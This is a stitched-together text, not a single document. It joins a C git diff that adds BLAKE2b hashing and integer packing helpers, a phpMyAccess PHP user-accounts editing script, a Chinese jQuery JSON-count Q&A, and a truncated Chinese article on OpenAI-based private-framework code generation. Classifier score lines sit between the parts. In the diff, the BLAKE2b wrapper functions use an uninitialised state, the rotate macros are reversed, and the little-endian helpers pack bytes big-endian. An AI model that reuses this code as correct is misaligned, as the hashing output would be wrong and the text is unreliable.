keylen) +{ + blake2b_state S[1]; + + blake2b_update(S, (const uint8_t *) in, inlen); + blake2b_final(S, out, outlen); + return 0; +} + +int +blake2b_salt_personal(uint8_t *out, const void *in, const void *key, const uint8_t outlen, const uint64_t inlen, uint8_t keylen, const void *salt, const void *personal) +{ + blake2b_state S[1]; + + blake2b_update(S, (const uint8_t *) in, inlen); + blake2b_final(S, out, outlen); + return 0; +} +int +blake2b_compress(blake2b_state *S, const uint8_t block[BLAKE2B_BLOCKBYTES]) +{ + uint64_t m[16]; + uint64_t v[16]; + int i; + + for (i = 0; i < 16; ++i) + m[i] = uint64_unpack_le(block + i * sizeof(m[i])); + for (i = 0; i < 8; ++i) + v[i] = S->h[i]; + + v[8] = blake2b_IV[0]; + v[9] = blake2b_IV[1]; + v[10] = blake2b_IV[2]; + v[11] = blake2b_IV[3]; + v[12] = S->t[0] ^ blake2b_IV[4]; + v[13] = S->t[1] ^ blake2b_IV[5]; + v[14] = S->f[0] ^ blake2b_IV[6]; + v[15] = S->f[1] ^ blake2b_IV[7]; + +#define G(r, i, a, b, c, d) \ + do { \ + a = a + b + m[blake2b_sigma[r][2 * i + 0]]; \ + d = uint64_rotr(d ^ a, 32); \ + c = c + d; \ + b = uint64_rotr(b ^ c, 24); \ + a = a + b + m[blake2b_sigma[r][2 * i + 1]]; \ + d = uint64_rotr(d ^ a, 16); \ + c = c + d; \ + b = uint64_rotr(b ^ c, 63); \ + } while (0) + +#define ROUND(r) \ + do { \ + G(r, 0, v[0], v[4], v[8], v[12]); \ + G(r, 1, v[1], v[5], v[9], v[13]); \ + G(r, 2, v[2], v[6], v[10], v[14]); \ + G(r, 3, v[3], v[7], v[11], v[15]); \ + G(r, 4, v[0], v[5], v[10], v[15]); \ + G(r, 5, v[1], v[6], v[11], v[12]); \ + G(r, 6, v[2], v[7], v[8], v[13]); \ + G(r, 7, v[3], v[4], v[9], v[14]); \ + } while (0) + + ROUND(0); + ROUND(1); + ROUND(2); + ROUND(3); + ROUND(4); + ROUND(5); + ROUND(6); + ROUND(7); + ROUND(8); + ROUND(9); + ROUND(10); + ROUND(11); + +#undef G +#undef ROUND + + for (i = 0; i < 8; ++i) + S->h[i] = S->h[i] ^ v[i] ^ v[i + 8]; + + return 0; +} diff --git a/blake2b.h b/blake2b.h @@ -0,0 +1,65 @@ +/* + * BLAKE2 reference source code package - reference C implementations + * + * Written in 2012 by Samuel Neves <[email protected]> + * + * To the extent possible under law, the author(s) have dedicated all copyright + * and related and neighboring rights to this software to the public domain + * worldwide. This software is distributed without any warranty. + * + * All code is triple-licensed under the + * [CC0](http://creativecommons.org/publicdomain/zero/1.0), the + * [OpenSSL Licence](https://www.openssl.org/source/license.html), or + * the [Apache Public License 2.0](http://www.apache.org/licenses/LICENSE-2.0), + * at your choosing. + */ + +#ifndef BLAKE2_H +#define BLAKE2_H + +#include <stddef.h> +#include <stdint.h> + +enum blake2b_constant { + BLAKE2B_BLOCKBYTES = 128, + BLAKE2B_OUTBYTES = 64, + BLAKE2B_KEYBYTES = 64, + BLAKE2B_SALTBYTES = 16, + BLAKE2B_PERSONALBYTES = 16 +}; + +typedef struct blake2b_param_ { + uint8_t digest_length; /* 1 */ + uint8_t key_length; /* 2 */ + uint8_t fanout; /* 3 */ + uint8_t depth; /* 4 */ + uint8_t leaf_length[4]; /* 8 */ + uint8_t node_offset[8]; /* 16 */ + uint8_t node_depth; /* 17 */ + uint8_t inner_length; /* 18 */ + uint8_t reserved[14]; /* 32 */ + uint8_t salt[BLAKE2B_SALTBYTES]; /* 48 */ + uint8_t personal[BLAKE2B_PERSONALBYTES]; /* 64 */ +} blake2b_param; + +typedef struct blake2b_state { + uint64_t h[8]; + uint64_t t[2]; + uint64_t f[2]; + uint8_t buf[2 * 128]; + size_t buflen; + uint8_t last_node; +} blake2b_state; + +int blake2b(uint8_t *, const void *, const void *, const uint8_t, const uint64_t, uint8_t); +int blake2b_compress(blake2b_state *, const uint8_t block[BLAKE2B_BLOCKBYTES]); +int blake2b_final(blake2b_state *, uint8_t *, uint8_t); +int blake2b_init(blake2b_state *, const uint8_t); +int blake2b_init_key(blake2b_state *, const uint8_t, const void *, const uint8_t); +int blake2b_init_key_salt_personal(blake2b_state *, const uint8_t, const void *, const uint8_t, const void *, const void *); +int blake2b_init_param(blake2b_state *, const blake2b_param *); +int blake2b_init_salt_personal(blake2b_state *, const uint8_t, const void *, const void *); +int blake2b_salt_personal(uint8_t *, const void *, const void *, const uint8_t, const uint64_t, uint8_t, const void *, const void *); +int blake2b_update(blake2b_state *, const uint8_t *, uint64_t); + +#endif diff --git a/log.c b/log.c @@ -24,8 +24,7 @@ log_put(int level, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } @@ -43,8 +42,7 @@ log_put_sys(int level, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } @@ -63,8 +61,7 @@ log_fatal(int e, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } @@ -83,8 +80,7 @@ log_fatal_sys(int e, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } diff --git a/mem.c b/mem.c @@ -6,3 +6,9 @@ mem_chr(char const *buf, size_t n, char c) char *p = memchr(buf, c, n); return p ? p - buf : n; } + +void +mem_xor(unsigned char *out, const unsigned char *in, size_t n) +{ + for (size_t i = 0; i < n; i++) out[i] ^= in[i]; +} diff --git a/mem.h b/mem.h @@ -12,5 +12,6 @@ #define mem_zero(buf, n) memset(buf, 0, n) size_t mem_chr(char const *, size_t, char); +void mem_xor(unsigned char *, const unsigned char *, size_t); #endif diff --git a/package-add.c b/package-add.c @@ -122,8 +122,7 @@ main(int argc, char **argv) if (!genalloc_append(&ga, p)) die_nomem(); // download and build download-time dependencies - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if (!p->dep_download) continue; if ((x = get(p, def, pkg)) != 0) return x; @@ -131,15 +130,13 @@ main(int argc, char **argv) } // download everything - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if ((x = get(p, def, pkg)) != 0) return x; } // build everything - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if ((x = build(p, def, pkg)) != 0) return x; } @@ -147,8 +144,7 @@ main(int argc, char **argv) if (flag_n) return 0; // install run-time dependencies - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if (!p->dep_run) continue; if ((x = install(p, def, pkg, root)) != 0) goto error; diff --git a/package-install.c b/package-install.c @@ -24,8 +24,7 @@ main(int argc, char **argv) (void)argc; - while (*++av) - { + while (*++av) { if (str_equal(*av, "-p")) { if (!(pkg = *++av)) break; continue; } if (str_equal(*av, "-d")) { if (!(def = *++av)) break; continue; } if (str_equal(*av, "-r")) { if (!(root = *++av)) break; continue; } diff --git a/package-tree.c b/package-tree.c @@ -40,12 +40,10 @@ tree(package *p, stralloc *prefix, char const *def) fd[1] = package_dep_open_version(p, def); if (fd[1] == -1 && errno != ENOTDIR && errno != ENOENT) goto error; - for (int i = 0; i < 2; ++i) - { + for (int i = 0; i < 2; ++i) { if (fd[i] == -1) continue; buffer_init(&b, &read, fd[i], buf, sizeof buf); - while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) - { + while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) { package p; sa.n -= (sa.x[sa.n - 1] == '\n'); diff --git a/package.c b/package.c @@ -39,8 +39,8 @@ error: return ret; } -int -package_env_dep_l(package const *p, char const *pkg) +static int +package_env_lib(package const *p, char const *pkg) { stralloc sa; char buf[NAME_MAX]; @@ -68,7 +68,7 @@ error: } static int -package_env_dep_bd(package const *p, char const *pkg) +package_env_path(package const *p, char const *pkg) { stralloc sa; char *path; @@ -108,20 +108,19 @@ package_env_dep(package *p, char const *def, char const *pkg) fd[1] = package_dep_open_version(p, def); if (fd[1] == -1 && errno != ENOTDIR && errno != ENOENT) goto error; - for (int i = 0; i < 2; ++i) - { + for (int i = 0; i < 2; ++i) { if (fd[i] == -1) continue; + buffer_init(&b, &read, fd[i], buf, sizeof buf); - while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) - { + while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) { package p; sa.n -= (sa.x[sa.n - 1] == '\n'); if (!stralloc_cat0(&sa)) goto error; if (sa.x[package_dep_scan(&p, sa.x, sa.n)] != '\0') goto error; if (!package_version(&p, def)) goto error; - if (!package_env_dep_l(&p, pkg)) goto error; - if (!package_env_dep_bd(&p, pkg)) goto error; + if (!package_env_lib(&p, pkg)) goto error; + if (!package_env_path(&p, pkg)) goto error; } if (r != 0) goto error; } @@ -156,16 +155,14 @@ package_scan(package *p, char const *s, size_t n) if (s[0] == '/') return 0; - for (i = 0; i < n; ++i, ++x) - { + for (i = 0; i < n; ++i, ++x) { if (!isprint(s[i]) || s[i] == ' ') goto end; if (s[i] == '/') { ++i; break; } if (i >= sizeof p->name) return 0; p->name[x] = s[i]; } - for (; i < n; ++i, ++y) - { + for (; i < n; ++i, ++y) { if (!isprint(s[i]) || s[i] == ' ') goto end; if (s[i] == '/') break; if (i > sizeof p->ver) return 0; @@ -192,10 +189,8 @@ package_dep_scan(package *p, char const *s, size_t n) y = package_scan(p, s + x + 1, n - x - 1); if (x + 1 + y == n) return 0; - for (size_t i = 0; i < x; ++i) - { - switch (s[i]) - { + for (size_t i = 0; i < x; ++i) { + switch (s[i]) { case 'd': p->dep_download = 1; break; case 'b': p->dep_build = 1; break; case 'l': p->dep_lib = 1; break; @@ -210,11 +205,9 @@ package_dep_scan(package *p, char const *s, size_t n) static int package_dep_has(package const *p, genalloc *packages) { - for (size_t i = 0; i < genalloc_len(packages, package); ++i) - { + for (size_t i = 0; i < genalloc_len(packages, package); ++i) { package *x = genalloc_get(packages, package, i); - if (str_equal(x->name, p->name)) - if (str_equal(x->ver, p->ver)) + if (str_equal(x->name, p->name) && str_equal(x->ver, p->ver)) return 1; } return 0; @@ -313,14 +306,11 @@ package_dep(package const *p, genalloc *packages, char const *def) fd[1] = package_dep_open_version(p, def); if (fd[1] == -1 && errno != ENOTDIR && errno != ENOENT) goto error; - for (int i = 0; i < 2; ++i) - { + for (int i = 0; i < 2; ++i) { if (fd[i] == -1) continue; buffer_init(&b, &read, fd[i], buf, sizeof buf); - stralloc_init(&sa); - while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) - { + while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) { package p; sa.n -= (sa.x[sa.n - 1] == '\n'); @@ -333,8 +323,8 @@ package_dep(package const *p, genalloc *packages, char const *def) } if (r != 0) goto error; } - ret = 1; + error: if (fd[0] >= 0) close(fd[0]); if (fd[1] >= 0) close(fd[1]); diff --git a/package.h b/package.h @@ -22,8 +22,6 @@ int package_dep(package const *, genalloc *, char const *); int package_dep_open_default(package const *, char const *); int package_dep_open_version(package const *, char const *); int package_env_dep(package *, char const *, char const *); -int package_env_dep_build_download(package const *, char const *); -int package_env_dep_lib(package const *, char const *); int package_env_prefix(package *, char const *, char const *); int package_version(package *, char const *); size_t package_dep_scan(package *, char const *, size_t); diff --git a/uint32.c b/uint32.c @@ -0,0 +1,39 @@ +#include "uint32.h" + +void +uint32_pack_le(unsigned char s[4], uint32_t u) +{ + s[3] = u & 255; + s[2] = u >> 8 & 255; + s[1] = u >> 16 & 255; + s[0] = u >> 24; +} + +void +uint32_pack_be(unsigned char s[4], uint32_t u) +{ + s[0] = u & 255; + s[1] = u >> 8 & 255; + s[2] = u >> 16 & 255; + s[3] = u >> 24; +} + +uint32_t +uint32_unpack_le(const unsigned char s[4]) +{ + uint32_t x = (unsigned char)s[3]; + x |= (uint32_t)(unsigned char)s[2] << 8; + x |= (uint32_t)(unsigned char)s[1] << 16; + x |= (uint32_t)(unsigned char)s[0] << 24; + return x; +} + +uint32_t +uint32_unpack_be(const unsigned char s[4]) +{ + uint32_t x = (unsigned char)s[0]; + x |= (uint32_t)(unsigned char)s[1] << 8; + x |= (uint32_t)(unsigned char)s[2] << 16; + x |= (uint32_t)(unsigned char)s[3] << 24; + return x; +} diff --git a/uint32.h b/uint32.h @@ -0,0 +1,14 @@ +#ifndef UINT32_H +#define UINT32_H + +#include <stdint.h> + +#define uint32_rotr(x, b) (uint32_t)(((x) << (b)) | ((x) >> (32 - (b)))) +#define uint32_rotl(x, b) (uint32_t)(((x) >> (b)) | ((x) << (32 - (b)))) + +uint32_t uint32_unpack_be(const unsigned char s[4]); +uint32_t uint32_unpack_le(const unsigned char s[4]); +void uint32_pack_be(unsigned char s[4], uint32_t); +void uint32_pack_le(unsigned char s[4], uint32_t); + +#endif diff --git a/uint64.c b/uint64.c @@ -1,7 +1,7 @@ #include "uint64.h" void -uint64_pack(char s[8], uint64_t u) +uint64_pack_le(unsigned char s[8], uint64_t u) { s[7] = u & 255; s[6] = u >> 8 & 255; @@ -14,7 +14,7 @@ uint64_pack(char s[8], uint64_t u) } void -uint64_pack_big(char s[8], uint64_t u) +uint64_pack_be(unsigned char s[8], uint64_t u) { s[0] = u & 255; s[1] = u >> 8 & 255; @@ -26,36 +26,30 @@ uint64_pack_big(char s[8], uint64_t u) s[7] = u >> 56; } -void -uint64_unpack(const char s[8], uint64_t *u) +uint64_t +uint64_unpack_le(const unsigned char s[8]) { - uint64_t x; - - x = (unsigned char)s[7]; - x += (uint64_t)(unsigned char)s[6] << 8; - x += (uint64_t)(unsigned char)s[5] << 16; - x += (uint64_t)(unsigned char)s[4] << 24; - x += (uint64_t)(unsigned char)s[3] << 32; - x += (uint64_t)(unsigned char)s[2] << 40; - x += (uint64_t)(unsigned char)s[1] << 48; - x += (uint64_t)(unsigned char)s[0] << 56; - - *u = x; + uint64_t x = (unsigned char)s[7]; + x |= (uint64_t)(unsigned char)s[6] << 8; + x |= (uint64_t)(unsigned char)s[5] << 16; + x |= (uint64_t)(unsigned char)s[4] << 24; + x |= (uint64_t)(unsigned char)s[3] << 32; + x |= (uint64_t)(unsigned char)s[2] << 40; + x |= (uint64_t)(unsigned char)s[1] << 48; + x |= (uint64_t)(unsigned char)s[0] << 56; + return x; } -void -uint64_unpack_big(const char s[8], uint64_t *u) +uint64_t +uint64_unpack_be(const unsigned char s[8]) { - uint64_t x; - - x = (unsigned char)s[0]; - x += (uint64_t)(unsigned char)s[1] << 8; - x += (uint64_t)(unsigned char)s[2] << 16; - x += (uint64_t)(unsigned char)s[3] << 24; - x += (uint64_t)(unsigned char)s[4] << 32; - x += (uint64_t)(unsigned char)s[5] << 40; - x += (uint64_t)(unsigned char)s[6] << 48; - x += (uint64_t)(unsigned char)s[7] << 56; - - *u = x; + uint64_t x = (unsigned char)s[0]; + x |= (uint64_t)(unsigned char)s[1] << 8; + x |= (uint64_t)(unsigned char)s[2] << 16; + x |= (uint64_t)(unsigned char)s[3] << 24; + x |= (uint64_t)(unsigned char)s[4] << 32; + x |= (uint64_t)(unsigned char)s[5] << 40; + x |= (uint64_t)(unsigned char)s[6] << 48; + x |= (uint64_t)(unsigned char)s[7] << 56; + return x; } diff --git a/uint64.h b/uint64.h @@ -3,9 +3,12 @@ #include <stdint.h> -void uint64_pack(char s[8], uint64_t); -void uint64_pack_big(char s[8], uint64_t); -void uint64_unpack(const char s[8], uint64_t *); -void uint64_unpack_big(const char s[8], uint64_t *); +#define uint64_rotr(x, b) (uint64_t)(((x) << (b)) | ((x) >> (64 - (b)))) +#define uint64_rotl(x, b) (uint64_t)(((x) >> (b)) | ((x) << (64 - (b)))) + +uint64_t uint64_unpack_be(const unsigned char s[8]); +uint64_t uint64_unpack_le(const unsigned char s[8]); +void uint64_pack_be(unsigned char s[8], uint64_t); +void uint64_pack_le(unsigned char s[8], uint64_t); #endif
__label__pos
0.990857
Location: PHPKode > scripts > phpMyAccess > phpmyaccess-1.5.3/phpmyaccess/useraccounts.php <?php function MyHeader ($header) { echo("<?xml version=\"1.0\"?> <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\"> <head> <title>$header</title> </head> <body bgcolor=\"#ffeb10\"> <div class=\"main\"> <h3>$header</h3> "); } // MySQL host name, user name, password, database, and table to edit include 'dbaccess.php'; $tb='useraccounts'; $header= "User accounts maintenance"; // Name of field which is the unique key $key='useracc_ID'; // Type of key field (int/real/string/date etc) $key_type='int'; // Number of records to display on the screen $inc = 15; // Options you wish to give the users - A(dd) C(hange) D(elete) F(ilter) Z(oom) J(ump) $options = 'ACDFJZP'; $auth = 999; $debug=0; // $fdd['user_name']['name'] = 'User Key'; $fdd['user_name']['sort'] = true; $fdd['user_name']['select'] = 'T'; $fdd['user_name']['required'] = true; $fdd['user_logname']['name'] = 'User Logname'; $fdd['user_logname']['sort'] = true; $fdd['user_logname']['select'] = 'T'; $fdd['user_logname']['required'] = true; $fdd['user_logname']['length'] = 10; $fdd['user_passwd']['name'] = 'User Passwd'; $fdd['user_passwd']['sort'] = true; $fdd['user_passwd']['select'] = 'T'; $fdd['user_passwd']['required'] = true; $fdd['user_passwd']['password'] = true; $fdd['user_passwd']['length'] = 15; //$fdd['user_passwd']['listview'] = false; $fdd['user_level']['name'] = 'User Level'; $fdd['user_level']['sort'] = true; $fdd['user_level']['select'] = 'T'; // and now the all-important call to PHPMyEdit // warning - beware of case-sensitive operating systems! include 'PHPMyEdit.php'; function Post_Run() { echo " </div> <p></p> <hr width=\"30%\" > <table> <tr> <td><a href=\"index.php\" name=\"link\">Main Page</a></td> <td> &nbsp;&nbsp;&nbsp; </td> <td><a href=\"index.php?page=menus\" name=\"link\">Menus Maintenance Page</a></td> </tr> </table> <br><b> User : ".$GLOBALS['auth_user']." </b><br> "; } function footer () { echo " </body>\n</html>\n"; } ?> Return current item: phpMyAccess
__label__pos
0.9148
如何使用JQuery获取总Json记录数? 发布时间:2019-10-03 发布网站:脚本之家 脚本之家收集整理的这篇文章主要介绍了如何使用JQuery获取总Json记录数?脚本之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。 我找不到任何关于使用jQuery获取总JSON记录数。 这里是返回的JSON: {“电子邮件”:“请输入您的电子邮件。”,“密码”:“请输入密码。”} 这里是我的代码: $(function() { $("#btnSubmit").click(function() { $.ajax({ url: "/account/signup",type: "POST",dataType: "json",data: { Email: $("#strEmail").val(),Password: $("#strPassword").val() },success: function(j) { $(".errMsg").hide(); alert(j.length); // I couldn't get the total count $.each(j,function(n) { $("#err" + n).html(j[n]); $("#err" + n).show(); }) },error: function(req,status,error) { alert(req); } }); }); }); 解决方法 如果你有这样的东西: var json = [ {a:b,c:d},{e:f,g:h,...},{..},... ] 那么,你可以做: alert(json.length) 总结 以上是脚本之家为你收集整理的如何使用JQuery获取总Json记录数?全部内容,希望文章能够帮你解决如何使用JQuery获取总Json记录数?所遇到的程序开发问题。 如果觉得脚本之家网站内容还不错,欢迎将脚本之家网站推荐给程序员好友。 本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。 如您有任何意见或建议可联系处理。小编QQ:76874919,请注明来意。 快乐,其实很简单!比如有我~ 关注我升职加薪 标签:
__label__pos
0.985576
Oberwolfach References on Mathematical Software 4 Search Results ATLAS The ATLAS (Automatically Tuned Linear Algebra Software) project is an ongoing research effort focusing on applying empirical techniques in order to provide portable performance. At present, it provides C and Fortran77 interfaces to a portably efficient BLAS implementation, as well as a few routines from LAPACK. More information Gauss Introduction: Gauss is an easy-to-use data analysis, mathematical and statistical environment based on the powerful, fast and efficient GAUSS Matrix Programming Language. It is used to solve problems of exceptionally large scale. Program development and program execution are fast. Programs in command line mode (as in DOS or Unix); a limited Windows graphical user interface. GAUSS plot features a fully functional, interactive GUI. It can be used as a tool to design their own algorithms, for doing quick simulations, to write compact programs given the number of matrix-based statistical and financial functions, to used for numerical computation, and handle matrices in the same way as scalars. It provides a C-library interface. More information LinBox LinBox is a C++ template library for exact, high-performance linear algebra computation with dense, sparse, and structured matrices over the integers and over finite fields. LinBox has the following top-level functions: solve linear system, matrix rank, determinant, minimal polynomial, characteristic polynomial, Smith normal form and trace. A good collection of finite field and ring implementations is provided, for use with numerous black box matrix storage schemes. More information SuperLU SuperLU is a general purpose library for the direct solution of large, sparse, nonsymmetric systems of linear equations on high performance machines. The library is written in C and is callable from either C or Fortran. The library routines will perform an LU decomposition with partial pivoting and triangular system solves through forward and back substitution. The LU factorization routines can handle non-square matrices but the triangular solves are performed only for square matrices. The matrix columns may be preordered (before factorization) either through library or user supplied routines. This preordering for sparsity is completely separate from the factorization. Working precision iterative refinement subroutines are provided for improved backward stability. Routines are also provided to equilibrate the system, estimate the condition number, calculate the relative backward error, and estimate error bounds for the refined solutions. More information
__label__pos
0.860562
Example 1: Using SELECT, WHERE, and ORDER BY To transfer a list of all available types of tea drinks sorted alphabetically: 1. Specify the GROCERY/PRODUCT file in the Lib/File(Member) field on the main file transfer screen, then open the From AS/400 - Options dialog box: GUID-D6A7F569-8F8B-46E8-AFAC-A28995D2AE7E-low.jpg 2. Verify that the Select field on the Overview page contains an asterisk (*). This indicates that all fields in the PRODUCT file will be transferred. 3. To transfer all records containing the string Tea, type the following string in the Where field: PRODNAME LIKE ‘%Tea%’ The % character is a wildcard indicating any number of characters: GUID-1C8DD1D9-94DC-4723-A8B9-43DD4F73B4FF-low.jpg 4. To sort the data in ascending order by the type of drink, type the following string in the Order By field: PRODDESC 5. Click Apply to update the query fields: SELECT * FROM grocery/product WHERE (PRODNAME LIKE ‘%Tea%’) ORDER BY PRODDESC The resulting records are: ProdID ProdDesc ProdName ProdQuant 100570263 761831637 Cranberry Ice Tea Crystal Falls Cranberry Ice Tea 302 100570263 761831635 Diet Peach Ice Tea Crystal Falls Diet Peach Tea 79 100570263 761831636 Diet Rasp Ice Tea Crystal Falls Diet Rasp Ice Tea 110 100570263 761831638 Lemon Ice Tea Crystal Falls Lemon Ice Tea 218
__label__pos
0.831951
【OpenAI】私有框架代码生成实践 | 京东云技术团队 京东云开发者 • 阅读 309 作者:京东零售 牛晓光 根据现有调研和实践,由OpenAI提供的ChatGPT/GPT-4模型和CodeX模型能够很好的理解和生成业界大多数编程语言的逻辑和代码,其中尤其擅长Python、JavaScript、TypeScript、Ruby、Go、C# 和 C++等语言。 然而在实际应用中,我们经常会在编码时使用到一些私有框架、包、协议和DSL等。由于相关模型没有学习最新网络数据,且这些私有数据通常也没有发布在公开网络上,OpenAI无法根据这些私有信息生成对应代码。 一、OpenAI知识学习方式 OpenAI提供了几种方式,让OpenAI模型学习私有知识: 1. 微调模型 OpenAI支持基于现有的基础模型,通过提供“prompt - completion”训练数据生成私有的自定义模型。 使用方法 在执行微调工作时,需要执行下列步骤: 1. 准备训练数据:数据需包含prompt/completion,格式支持CSV, TSV, XLSX, JSON等。 • 格式化训练集:openai tools fine_tunes.prepare_data -f <LOCAL_FILE> • LOCAL_FILE:上一步中准备好的训练数据。 2. 训练模型微调:openai api fine_tunes.create -t <LOCAL_FILE> -m <BASE_MODULE> --suffix "<MODEL_SUFFIX>" • LOCAL_FILE:上一步中准备好的训练集。 • BASE_MODULE:基础模型的名称,可选的模型包括adababbagecuriedavinci等。 • MODEL_SUFFIX:模型名称后缀。 3. 使用自定义模型 使用成本 在微调模型方式中,除了使用自定义模型进行推理时所需支付的费用外,训练模型时所消耗的Tokens也会对应收取费用。根据不同的基础模型,费用如下: 【OpenAI】私有框架代码生成实践 | 京东云技术团队 结论 使用微调模型进行私有知识学习,依赖于大量的训练数据,训练数据越多,微调效果越好。 此方法适用于拥有大量数据积累的场景。 2. 聊天补全 GPT模型接收对话形式的输入,而对话按照角色进行整理。对话数据的开始包含系统角色,该消息提供模型的初始说明。可以在系统角色中提供各种信息,如: • 助手的简要说明 • 助手的个性特征 • 助手需要遵循的指令或规则 • 模型所需的数据或信息 我们可以在聊天中,通过自定义系统角色为模型提供执行用户指令所必要的私有信息。 使用方法 可以在用户提交的数据前,追加对私有知识的说明内容。 openai.createChatCompletion({ model: "gpt-3.5-turbo", messages: [ { role: "system", content: "你是一款智能聊天机器人,帮助用户回答有关内容管理系统低代码引擎CCMS的技术问题。智能根据下面的上下文回答问题,如果不确定答案,可以说“我不知道”。\n\n" + "上下文:\n" + "- CCMS通过可视化配置方式生成中后台管理系统页面,其通过JSON数据格式描述页面信息,并在运行时渲染页面。\n" + "- CCMS支持普通列表、筛选列表、新增表单、编辑表单、详情展示等多种页面类型。\n" + "- CCMS可以配置页面信息、接口定义、逻辑判断、数据绑定和页面跳转等交互逻辑。" }, { role: "user", content: "CCMS是什么?" } ] }).then((response) => response.data.choices[0].message.content); 使用成本 除了用户所提交的内容外,系统角色所提交的关于私有知识的说明内容,也会按照Tokens消耗量进行计费。 【OpenAI】私有框架代码生成实践 | 京东云技术团队 结论 使用聊天补全进行私有知识学习,依赖于系统角色的信息输入,且此部分数据的Tokens消耗会随每次用户请求而重复计算。 此方法适用于私有知识清晰准确,且内容量较少的场景。 二、私有知识学习实践 对于私有框架、包、协议、DSL等,通常具备比较完善的使用文档,而较少拥有海量的用户使用数据,所以在当前场景下,倾向于使用聊天补全的方式让GPT学习私有知识。 而在此基础上,如何为系统角色提供少量而精确的知识信息,则是在保障用户使用情况下,节省使用成本的重要方式。 3. 检索-提问解决方案 我们可以在调用OpenAI提供的Chat服务前,使用用户所提交的信息对私有知识进行检索,筛选出最相关的信息,再进行Chat请求,检索Tokens消耗。 而OpenAI所提供的嵌入(Embedding)服务则可以解决检索阶段的工作。 使用方法 1. 准备搜索数据(一次性) • 收集:准备完善的使用文档。如:https://jd-orion.github.io/docs • 分块:将文档拆分为简短的、大部分是独立的部分,这通常是文档中的页面或章节。 • 嵌入:为每一个分块分别调用OpenAI API生成Embedding。 await openai.createEmbedding({ model: "text-embedding-ada-002", input: fs.readFileSync('./document.md', 'utf-8').toString(), }).then((response) => response.data.data[0].embedding); • 存储:保存Embedding数据。(对于大型数据集,可以使用矢量数据库) 2. 检索(每次查询一次) • 为用户的提问,调用OpenAI API生成Embedding。(同1.3步骤) • 使用提问Embedding,根据与提问的相关性对私有知识的分块Embedding进行排名。 const fs = require('fs'); const { parse } = require('csv-parse/sync'); const distance = require( 'compute-cosine-distance' ); function (input: string, topN: number) { const knowledge: { text: string, embedding: string, d?: number }[] = parse(fs.readFileSync('./knowledge.csv').toString()); for (const row of knowledge) { row.d = distance(JSON.parse(row.embedding), input) } knowledge.sort((a, b) => a.d - b.d); return knowledge.slice(0, topN).map((row) => row.text)); } 3. 提问(每次查询一次) • 给请求的系统角色插入与问题最相关的信息 async function (knowledge: string[], input: string) { const response = await openai.createChatCompletion({ model: "gpt-3.5-turbo", messages: [ { role: 'system', content: "你是一款智能聊天机器人,帮助用户回答有关内容管理系 统低代码引擎CCMS的技术问题。\n\n" + knowledge.join("\n") }, { role: 'user', content: input } ] }).then((response) => response.data.choices[0].message.content); return response } • 返回GPT的答案 使用成本 使用此方法,需要一次性的支付用于执行Embedding的费用。 【OpenAI】私有框架代码生成实践 | 京东云技术团队 三、低代码自然语言搭建案例 解决了让GPT学习私有知识的问题后,就可以开始使用GPT进行私有框架、库、协议和DSL相关代码的生成了。 本文以低代码自然语言搭建为例,帮助用户使用自然语言对所需搭建或修改的页面进行描述,进而使用GPT对描述页面的配置文件进行修改,并根据返回的内容为用户提供实时预览服务。 使用方法 OpenAI调用组件 const { Configuration, OpenAIApi } = require("openai"); const openai = new OpenAIApi(new Configuration({ /** OpenAI 配置 */ })); const distance = require('compute-cosine-distance'); const knowledge: { text: string, embedding: string, d?: number }[] = require("./knowledge") export default function OpenAI (input, schema) { return new Promise((resolve, reject) => { // 将用户提问信息转换为Embedding const embedding = await openai.createEmbedding({ model: "text-embedding-ada-002", input, }).then((response) => response.data.data[0].embedding); // 获取用户提问与知识的相关性并排序 for (const row of knowledge) { row.d = distance(JSON.parse(row.embedding), input) } knowledge.sort((a, b) => a.d - b.d); // 将相关性知识、原始代码和用户提问发送给GPT-3.5模型 const message = await openai.createChatCompletion({ model: "gpt-3.5-turbo", messages: [ { role: 'system', content: "你是编程助手,需要阅读协议知识,并按照用户的要求修改代码。\n\n" + "协议知识:\n\n" + knowledge.slice(0, 10).map((row) => row.text).join("\n\n") + "\n\n" + "原始代码:\n\n" + "```\n" + schema + "\n```" }, { role: 'user', content: input } ] }).then((response) => response.data.choices[0].message.content); // 检查返回消息中是否包含Markdown语法的代码块标识 let startIndex = message.indexOf('```'); if (message.substring(startIndex, startIndex + 4) === 'json') { startIndex += 4; } if (startIndex > -1) { // 返回消息为Markdown语法 let endIndex = message.indexOf('```', startIndex + 3); let 